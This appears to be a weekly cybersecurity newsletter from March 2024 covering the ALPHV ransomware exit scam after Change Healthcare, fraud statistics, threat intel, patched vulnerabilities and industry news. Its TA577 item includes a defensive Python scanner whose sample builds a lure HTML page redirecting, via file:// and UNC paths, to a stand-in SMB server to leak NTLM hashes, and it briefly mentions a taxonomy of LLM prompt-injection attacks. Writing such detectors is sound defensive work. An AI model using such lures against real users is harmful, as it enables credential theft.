Robin’s Newsletter #299

10 March 2024. Volume 7, Issue 10
ALPHV pulls an exit scam after Change Healthcare seems to make ransom payment.

This week

Change Healthcare restoration continues as BlackCat closes up shop, absconds with ransom payment

  • Change Healthcare, the UnitedHealth Group subsidiary victimised by the ALPHV/BlackCat ransomware gang, recovered some of its systems this week. The company’s electronic prescription systems, used by pharmacies across the US, are “now fully functional”. The outage has been disruptive for small and medium-sized pharmacies that rely on the systems to file claims and receive insurance payments, leaving some facing cash flow problems.
  • The restoration may partly be down to critical data having been recovered: reports surfaced this week of an alleged $22 million ransom payment. UnitedHealth has declined to comment on the reports. LINK
  • Meanwhile, the ALPHV/BlackCat ransomware gang shut down its servers this week and replaced its dark web site with what appeared to be an FBI seizure notice. However, the National Crime Agency, quoted on the seizure notice, says it wasn’t involved with the takedown, leading to speculation that the cybercriminals had engaged in an exit scam and made off with the proceeds. LINK
  • That claim appears to be backed up by a post on a crime forum from a user claiming to be the ALPHV affiliate responsible for the attack, who says the ransomware group has disabled their accounts and made off with the money without paying them their share. There’s no honour amongst thieves, eh? LINK
  • It’s reignited discussions within the information security community about banning ransomware payments. Carly Page has a piece on the complexities of this potential policy. Ransomware as a crime category exploits the gap between the proximity afforded by modern computer networks and the distance preserved by traditional extradition treaties: the key players are known to law enforcement, but without extradition treaties, pursuing them through traditional channels is difficult. LINK

Interesting stats

Ransomware dominates the headlines but pales when it comes to financial losses… $12.5 billion (up 22%) in online fraud reported to the FBI in 2023, including $2.9 billion (21,489 complaints) associated with Business Email Compromise (BEC) scams, $744.2 million (55,851 complaints) with personal data breaches, $59.6 million (2,825 complaints) to ransomware. 2023 Internet Crime Report (PDF)

Other newsy bits / in brief

  • A taxonomy of large language model (LLM) prompt injection attacks in the paper Ignore This Title and HackAPrompt. These prompts are used to escape the restrictions placed on generative AI tools like ChatGPT. LINK

A Taxonomical Ontology of Prompt Hacking Techniques. (Source: Schulhoff et al)

  • Microsoft says that password-spraying attacks by APT29 (aka Cozy Bear) have increased tenfold. In a blog post, the company says that the Russian intelligence operation “is using information initially exfiltrated from our corporate email systems” to gain unauthorised access to “some of the company’s source code repositories and internal systems”. LINK

⚠️ Incidents:

  • Russia released an intercepted recording of a German military conference call discussing the supply of cruise missiles to Ukraine. The meeting was held over Webex, and one of the senior officials was dialling in by phone from a hotel in Singapore during a defence conference. So this is less a failing of German (or Webex) security and more old-fashioned call interception. LINK
  • American Express is warning customers that their payment card details may have been compromised after a breach at a merchant processor. “American Express owned or controlled systems were not compromised by this incident,” the company said in the breach notification, “we are providing this notice to you as a precautionary measure.” We may see more announcements in the coming days because the breach occurred at a “service provider engaged by numerous merchants”. LINK
  • Ukraine claims to have compromised Russian defence ministry servers. LINK
  • A “cyber incident” forced Canada’s anti-financial crime agency — the Financial Transactions and Reports Analysis Centre of Canada (FINTRAC) — to take its corporate systems offline. Intelligence and classified systems were not accessed or affected. LINK

🏴‍☠️ Ransomware:

  • “We have more than enough beer in stock”: Belgian brewery Duvel halted production after detecting ransomware on its network. LINK

🕵️ Threat Intel:

  • TA577, an initial access broker associated with Qbot and Black Basta ransomware, has shifted tactics and begun trying to steal the NT LAN Manager (NTLM) hashes that Windows systems use to authenticate. The technique is to email a ZIP file containing an HTML file that redirects, via a file:// URL, to an SMB server controlled by the attacker; Windows tries to authenticate to that server and in doing so hands over the NTLM challenge-response (the “hash”), which can be cracked offline or relayed. (The ZIP is needed so that the HTML is opened from a local file, as a file:// link placed directly in an email would be blocked.) LINK
  • Analysis of the stealthy GTPDOOR malware, which may be linked to UNC1945/LightBasin, a suspected Chinese intelligence operation targeting telcos globally. LINK
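To show what the lure in the TA577 item above looks like on the wire and how a mail gateway or sandbox could catch it, here is an added Python example (my code, not TA577’s tooling or any vendor’s detection rule): it unpacks a ZIP attachment, looks inside HTML-like members for file:// URLs and UNC paths that name a remote host, and reports that host. The sample ZIP and its pages are constructed for the example, and 203.0.113.10 is a documentation address standing in for an attacker’s SMB server.

```python
"""Flag HTML attachments (loose or inside a ZIP) that would make a Windows client
reach out to a remote SMB server via a file:// URL or UNC path, which is what
triggers the outbound NTLM authentication that TA577's lures harvest.
Added example; the lure below is constructed and 203.0.113.10 is a documentation address."""
import io
import re
import zipfile

# file: URLs that carry a host. Accepted forms:
#   file://HOST/share/...   file://///HOST/share/...   file:///\\HOST\share\...
# file:///C:/... and file:///etc/... have no host and deliberately do not match.
FILE_URL = re.compile(r"file:(?:////+|//|///\\\\)([A-Za-z0-9][A-Za-z0-9.\-]*)[\\/]", re.I)
# Bare UNC paths: \\HOST\share in markup, \\\\HOST\\share inside JS string literals.
# The leading quote/space/=/( anchor stops \\share\\x being read as a second host.
UNC_PATH = re.compile(r"""(?:^|[\s"'=(,>])\\{2,}([A-Za-z0-9][A-Za-z0-9.\-]*)[\\/]""")

HTML_SUFFIXES = (".htm", ".html", ".hta", ".shtml", ".xhtml", ".mht", ".mhtml")
MAX_BYTES = 1_000_000          # do not inflate larger members (zip-bomb guard)
LOCAL_HOSTS = {"localhost", "127.0.0.1"}


def scan_html(html: str) -> list[dict]:
    """One finding per remote host the page would make the client contact over SMB.
    Any element that loads a file: URL or UNC path triggers the authentication
    (meta refresh, location.href, <img src>, <iframe src>, ...), so the reference
    itself, not the surrounding tag, is the signal."""
    findings = {}
    for pattern, kind in ((FILE_URL, "file-url"), (UNC_PATH, "unc-path")):
        for m in pattern.finditer(html):
            host = m.group(1).lower()
            if host in LOCAL_HOSTS:
                continue
            start, end = max(0, m.start() - 40), min(len(html), m.end() + 40)
            findings.setdefault(host, {"host": host, "kind": kind,
                                       "evidence": html[start:end].strip()})
    return sorted(findings.values(), key=lambda f: f["host"])


def scan_zip(zip_bytes: bytes) -> list[dict]:
    """Scan every HTML-like member of a ZIP attachment; findings carry the member name."""
    results = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(HTML_SUFFIXES):
                continue
            if info.file_size > MAX_BYTES:
                results.append({"member": info.filename, "host": None,
                                "kind": "skipped-too-large", "evidence": ""})
                continue
            with zf.open(info) as fh:
                text = fh.read(MAX_BYTES).decode("utf-8", "ignore")
            for finding in scan_html(text):
                results.append({"member": info.filename, **finding})
    return results


def build_sample_zip() -> bytes:
    """Constructed lure for demonstration, not a real TA577 sample: one HTML page
    that meta-refreshes to file://203.0.113.10 (and falls back to a UNC path from
    JavaScript), plus a benign page that only uses a local file: URL."""
    lure = (
        '<html><head><meta http-equiv="refresh" '
        'content="0; url=file://203.0.113.10/ntlm/invoice.txt"></head>'
        '<body>Loading invoice...'
        '<script>window.location.href="\\\\\\\\203.0.113.10\\\\backup\\\\x";</script>'
        '</body></html>'
    )
    benign = ('<html><body><a href="https://example.org/report">Report</a>'
              '<img src="file:///C:/Users/me/logo.png"></body></html>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice_2024.html", lure)
        zf.writestr("readme.html", benign)
        zf.writestr("notes.txt", "file://203.0.113.10/ignored")  # not HTML, not scanned
    return buf.getvalue()


if __name__ == "__main__":
    for hit in scan_zip(build_sample_zip()):
        print(f"{hit['member']}: {hit['kind']} -> {hit['host']} | {hit['evidence']}")
```

The scan catches the lure, not the leak: the hash leaves the network only when Windows answers the rogue server’s NTLM challenge. Egress filtering of TCP 445 at the perimeter and the Windows policy “Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers” stop that even when a user opens the file, so the two belong together.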

🪲 Vulnerabilities:

  • VMware has released patches for all versions of its ESXi, Workstation, Fusion, and Cloud Foundation products, including unsupported/end-of-life versions, because of four vulnerabilities that allow an attacker inside a virtual machine to break out of the VM sandbox and hypervisor protections. CVE-2024-22252, CVE-2024-22253, CVE-2024-22254 and CVE-2024-22255 score up to 9.3/10. The vendor says it isn’t aware of any evidence that the vulnerabilities are being actively exploited, though the high profile of the release suggests it may not stay that way for long. LINK, ADVISORY
  • JetBrains is warning users of its on-premise TeamCity continuous integration (CI/CD) product to patch two vulnerabilities urgently. Version 2023.11.4 fixes CVE-2024-27198 (9.8/10) and CVE-2024-27199 (7.3/10), which allow a remote attacker to bypass authentication checks and take administrative control of the server. LINK, ADVISORY
  • QNAP has fixed a critical authentication bypass and two other vulnerabilities in its network attached storage (NAS) products (CVE-2024-21899, CVE-2024-21900, and CVE-2024-21901). LINK, ADVISORY
  • North Korea’s Lazarus group exploited a Windows 0-day for six months after Microsoft knew of it, using it to install the ‘FudModule’ rootkit. CVE-2024-21338 (7.8/10) is an ‘admin-to-kernel’ issue; Microsoft does not consider admin-to-kernel a security boundary, which may be why it took time to address. LINK, ADVISORY
  • Apple fixed two 0-day iOS vulnerabilities that had been exploited in the wild. CVE-2024-23225 (7.8/10) and CVE-2024-23296, in the iOS kernel and RTKit respectively, allowed an attacker who already had kernel read/write to bypass kernel memory protections. While these had been exploited in the wild, they were likely used by intelligence agencies or spyware operators to compromise the devices of high-value targets rather than for widespread exploitation against most users. LINK, ADVISORY

🧰 Guidance and tools:

  • Microsoft has updated its Security Development Lifecycle (SDL). First published 20 years ago, the SDL now describes a “continuous SDL” to reflect cloud and CI/CD practices, with an emphasis on data and evidence. It’s a useful reference for engineering teams seeking inspiration for their own SDLC practices. LINK
  • NSA and CISA have published practices for securing cloud services, including cloud identity, key management, network segmentation, data security and risk management of service providers. LINK

📜 Regulation:

  • An industry-led advisory group to the White House says market forces are ‘insufficient’ and that more economic incentives are needed to get critical infrastructure operators to raise their cyber security to the levels needed to protect national security. Industry telling the government it needs more money to do what the government wants is hardly unusual, though it’s equally unsurprising that private companies don’t account for the full public impact of their own failures. LINK

👮 Law Enforcement:

  • Law enforcement doesn’t want to be “customer service” reps for Meta any more, as Instagram and Facebook account takeover complaints soar. LINK
  • The US National Guard airman, Jack Teixeira, who had been leaking classified information (vol. 6, iss. 16) on Discord to impress his friends, has pleaded guilty. LINK

💰 Investments, mergers and acquisitions:

  • Axonius has raised $200 million to expand its asset management platform. LINK
  • Paris-based homomorphic encryption outfit Zama has raised a $73 million Series A funding round. LINK
Robin